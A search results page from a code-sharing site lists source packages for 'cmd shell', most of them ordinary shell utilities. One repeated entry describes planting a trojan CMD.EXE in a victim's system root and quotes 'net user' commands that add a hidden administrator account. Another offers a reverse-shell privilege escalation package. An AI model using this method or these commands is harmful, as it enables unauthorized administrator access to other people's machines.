Welcome![Sign In][Sign Up]
Location:
Search - cmd shell

Search list

[Exploitcmd漏洞源代码

Description: 你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级
Platform: | Size: 18944 | Author: 姜振 | Hits:

[Remote ControlSminpleCMDShell

Description: 一个简单的CMD Shell的源代码 学习CMD Shell 的可以借鉴一下 -a simple CMD Shell to study the source code CMD Shell can learn some lessons from the
Platform: | Size: 7734 | Author: 巴弗冷 | Hits:

[Linux-Unixshell

Description: Cmd Shell(命令行交互)是黑客永恒的话题,它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。 文件传输 对于溢出漏洞获得的cmd shell,最大的问题就是如何上传文件。由于蠕虫病毒流行,连接ipc$所需要的139或445端口被路由封锁。再加上WinXP系统加强了对ipc$的保护,通过ipc$及默认共享上传文件的手段基本无效了。ftp和tftp是两种可行的方法,介于其已被大家熟知,本文就不介绍了。还有三种大家熟悉的办法,作为总结我再提一下-Cmd Shell (interactive command line) is the eternal topic of hackers, and it has a long history for all eternity. This paper introduces and summarizes some of the command line control of the Windows system. These methods are used to the extent possible system onboard tools to achieve. File transfer for overflow vulnerability was the shell cmd, the biggest problem is how to upload the file. As the worm epidemic, linking WAFA need $ 139 or 445 port blockade was routing. WinXP system coupled with the strengthening of the IPS $ protection, and by default IPS $ Upload file sharing of the basic means to no avail. Ftp and tftp are two possible methods, ranging from its already well-known, this is not introduced. There are three ways you know, again, I conclude what
Platform: | Size: 32767 | Author: dly | Hits:

[Othercmd漏洞源代码

Description: 你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级-cmd loopholes in the source code
Platform: | Size: 18432 | Author: 姜振 | Hits:

[Windows DevelopSendToCmd-src

Description: 一个windows shell扩展程序dll源码 可以在鼠标右键的“发送到”菜单中增加一个“console window” 用于在资源管理器中打开console方式的exe文件 结果在新开的console窗口中显示 而不是缺省的一闪而过-a shell windows dll extension procedures in the source code by right-clicking the "Send to" menu to add a "console window" for the resource management for open console mode of exe files in the new findings open the console window shows instead of the default rather than the flashing
Platform: | Size: 11264 | Author: 甘荣 | Hits:

[Remote ControlSminpleCMDShell

Description: 一个简单的CMD Shell的源代码 学习CMD Shell 的可以借鉴一下 -a simple CMD Shell to study the source code CMD Shell can learn some lessons from the
Platform: | Size: 7168 | Author: 巴弗冷 | Hits:

[Windows Developsquirrelsh-1.2.3-src

Description: Squirrel Shell is made as a cross-platform alternative to system shells like bash in Linux and cmd.exe (command.com) in Microsoft Windows. It is based on scripting language "Squirrel".
Platform: | Size: 674816 | Author: dreamgate | Hits:

[Shell apiShell

Description: 基本上shell分两大类:   一:图形界面shell(Graphical User Interface shell 即 GUI shell)   例如:应用最为广泛的 Windows Explorer (微软的windows系列制作系统),还有也包括广为人知的 Linux shell,其中linux shell 包括 X windows manger (BlackBox和FluxBox),以及功能更强大的CDE、GNOME、KD、 XFCE。   二:命令行式 shell(Command Line Interface shell ,即CLI shell)   例如:   bash / sh / ksh / csh(Unix/linux 系统)   COMMAND.COM(MS-DOS 系统)   cmd.exe / 命令提示字符(Windows NT 系统)   Windows PowerShell(支援 .NET Framework 技术的 Windows NT 系统) -Shell is basically divided into two categories: a: a graphical interface shell (Graphical User Interface shell or GUI shell) example: the most widely used Windows Explorer (Microsoft windows family of production systems), there are also well-known Linux shell, which linux shell, including X windows manger (BlackBox and FluxBox), as well as the more powerful of the CDE, GNOME, KD, XFCE. Second: the command line shell (Command Line Interface shell, that is, CLI shell) such as: bash/sh/ksh/csh (Unix/linux systems) COMMAND.COM (MS-DOS systems) cmd.exe/characters in the command prompt (Windows NT system) Windows PowerShell (support. NET Framework technology, Windows NT systems)
Platform: | Size: 447488 | Author: grub | Hits:

[Shell apicommand

Description: this source code is cmd shell :) source code is not mine, i am newbie and beginner xD
Platform: | Size: 2048 | Author: lks | Hits:

[Internet-Networkwifishell

Description: 在windows系统中通过调用wlanapi.dll提供的API 在cmd shell中访问wifi的方法-using cmd shell to connect wifi
Platform: | Size: 174080 | Author: sam | Hits:

[Windows Develop20091003ok

Description: 运程控制软件,可以实现最基本的cmd shell 只是在本机测试,没有过多的实现-Fortune control software, can be achieved cmd shell is just the most basic test of this machine, there is no excess to achieve
Platform: | Size: 9981952 | Author: 198706 | Hits:

[Embeded-SCM DevelopSTM32_fatfs_shell_double_mode

Description: 实现了FATFS+SD1.1+Shell。大约20 的代码是出自本人。 其中实现了的shell命令cmd,ls,pwd,cat等。 这是其中一个版本,为了方便大家阅读,如果有兴趣可以查看我的另外一个,实现了FATFS+SDHC+SD2.0+SD1.1+Shell。 操作方法: 上电后,发字符串!s0! 进入dataflash shell模式,发字符串close则退出shell模式 发字符串!s1! 进入SD卡shell 模式,发字符串close则退出shell模式 源码已经在Keil4中运行过,基于STM32F103平台 源码很多是基于网上的资料。感谢各位辛勤的开源大侠。-Achieved FATFS+ SDHC+ SD2.0+ SD1.1+ Shell+ DataFlash. This functional integration is absolutely no line. About 20 of the code is from himself. Operation method: After power-on, hair string! S0! Enter dataflash shell model, made out of shell pattern string close the hair string! S1! Into the SD card shell model, made a string out of shell mode support close the MMC (not test), SD1.0 SD2.0 (ordinary and SDHC) source has been Keil4 run-off, based on STM32F103 source platform is based on a lot of online information. Thank you for the hard open-source heroes.
Platform: | Size: 438272 | Author: BertonHe | Hits:

[Shell apiCMD

Description: cmd shell 命令全集方便参数与使用-cmd shell
Platform: | Size: 9216 | Author: edobnet | Hits:

[Internet-Networkvb_socket

Description: VB 开发简单Socket局域网聊天,远程执行CMD SHELL 运行文件-Development of simple VB Socket LAN chat, run files remotely CMD SHELL
Platform: | Size: 3040256 | Author: 郭荣华 | Hits:

[ConsoleMSYS-1.0.11

Description: MSYS is a collection of GNU utilities such as bash, make, gawk and grep to allow building of applications and programs which depend on traditionally UNIX tools to be present. It is intended to supplement MinGW and the deficiencies of the cmd shell.
Platform: | Size: 3252224 | Author: rdjusr | Hits:

[WEB CodeShell-Cmd

Description: c#调用cmd命令行 通过cmd 扩充 绝对超值 完全免费-c# call cmd command line, the absolute value through the expansion of free cmd
Platform: | Size: 28672 | Author: hucanye | Hits:

[Communicationpipe-cmd-shell

Description: 使用管道来进行进程之间通讯的例子。本例演示了如何使用管道来和cmd.exe进程通讯。-This example demonstrates how to use pipe to communicate with the "cmd.exe" process.
Platform: | Size: 12288 | Author: woshiguan | Hits:

[Othercmd-shell-rebound-mention-the-right

Description: cmd反弹shell提权的其中一種提权的方法-Methods cmd shell bounce right to mention to mention the right one
Platform: | Size: 670720 | Author: wong | Hits:

[Linux-Unixcmd.tar

Description: 自己在shell实现命令, 以及getopt的用法。。。。。。。。。。。。。(Implement command in the shell, and the use of the getopt...)
Platform: | Size: 1024 | Author: Austzhu | Hits:

[Windows Developkog (1)

Description: cmd外壳,集成登录注册功能,仅限当前文件夹保存,具体地址可以自行更改(CMD shell, integrated login registration function, only the current folder saved, the specific address can be changed by itself.)
Platform: | Size: 1024 | Author: ES1562 | Hits:
« 12 3 »

CodeBus www.codebus.net